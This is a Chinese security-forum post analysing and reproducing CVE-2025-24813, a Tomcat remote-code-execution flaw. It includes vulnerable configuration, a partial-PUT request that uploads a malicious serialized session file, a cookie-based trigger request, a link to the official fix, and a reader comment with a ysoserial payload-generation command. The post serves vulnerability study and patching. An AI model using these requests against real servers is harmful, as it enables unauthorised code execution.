奇安信攻防社区-全网首发！CVE-2025-24813 Tomcat 最新 RCE 分析复现

全网首发！CVE-2025-24813 Tomcat 最新 RCE 分析复现

Tomcat最新RCE（CVE-2025-24813）分析复现

**漏洞概况**

Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发，是目前最流行的 Java Web 服务器之一。  
该漏洞利用条件较为复杂，需同时满足以下四个条件：

1. 应用程序启用了DefaultServlet写入功能，该功能默认关闭
2. 应用支持了 partial PUT 请求，能够将恶意的序列化数据写入到会话文件中，该功能默认开启
3. 应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置，需要额外配置
4. 应用中包含一个存在反序列化漏洞的库，比如存在于类路径下的 commons-collections，此条件取决于业务实现是否依赖存在反序列化利用链的库

**漏洞影响范围**

- 9.0.0.M1 &lt;= tomcat &lt;= 9.0.98
- 10.1.0-M1 &lt;= tomcat &lt;= 10.1.34
- 11.0.0-M1 &lt;= tomcat &lt;= 11.0.2

**漏洞原理分析**

`Content-Range` 在 Tomcat 的HTTP PUT请求中主要用于实现大文件的分块传输。在文件上传未完成的情况下，内容会被临时存储在Tomcat的工作目录：`$CATALINA_BASE/work/Catalina/localhost/ROOT`。

该漏洞的核心在于不完整PUT请求上传时的文件名处理机制：文件路径中的分隔符`/`会被转换为`.`。例如：访问`/xxxxx/session`会被解析为`.xxxxx.session`

因此整个漏洞的利用过程为：

1. Tomcat的File会话存储默认路径同样位于：`CATALINA_BASE/work/Catalina/localhost/ROOT`
2. 当存在反序列化利用链时，可以上传包含恶意序列化数据的文件
3. 通过设置`JSESSIONID=.xxxxx`来触发漏洞

**环境配置**

在conf/context.xml中，添加如下配置，开启File文件会话存储

```php
<Context\>  
<Manager className\="org.apache.catalina.session.PersistentManager"\>  
    <Store className\="org.apache.catalina.session.FileStore"/>  
</Manager\>  
</Context\>
```

在conf/web.xml中，将DefaultServlet的readonly配置为false，启用写入功能

```php
<servlet\>  
    <servlet-name\>default</servlet-name\>  
    <servlet-class\>org.apache.catalina.servlets.DefaultServlet</servlet-class\>  
    <init-param\>  
        <param-name\>debug</param-name\>  
        <param-value\>0</param-value\>  
    </init-param\>  
    <init-param\>  
        <param-name\>readonly</param-name\>  
        <param-value\>false</param-value\>  
    </init-param\>  
    <load-on-startup\>1</load-on-startup\>  
</servlet\>
```

将Commons Collections 3.2.1.jar放入lib文件夹

**漏洞复现**

生成一个恶意的序列化文件，使用以下数据包上传，需要注意Range的分块值需要与Length保持一致，且大于当前文件的长度。

```php
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200

{{反序列化文件内容)}}
```

使用以下PoC触发

```php
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
```

![image.png](https://shs3.b.qianxin.com/attack_forum/2025/03/attach-6d34f1c20c0e1e06c3ac1d5d816ff26e2f5f3010.png)

**修复方案**

Apache基金会官方已发布漏洞公告，可下载补丁更新：<https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq>

发表于 2025-03-11 18:30:00
阅读 ( 12816 )
分类：Web服务器

2 条评论

网安诗人 1秒前

跟着大佬复现了一下,这个洞看着跟CVE-2020-9484很像,但是CVE-2020-9484必须在靶机中把反序列化文件放到/tmp/test.session,命令如下java -jar ysoserial-all.jar Groovy1 "touch/tmp/test">/tmp/test.session.但CVE-2025-24813可以通过put请求上传反序列化文件,利用起来更方便

MaXwe11_ 1秒前

写的不错，感谢分享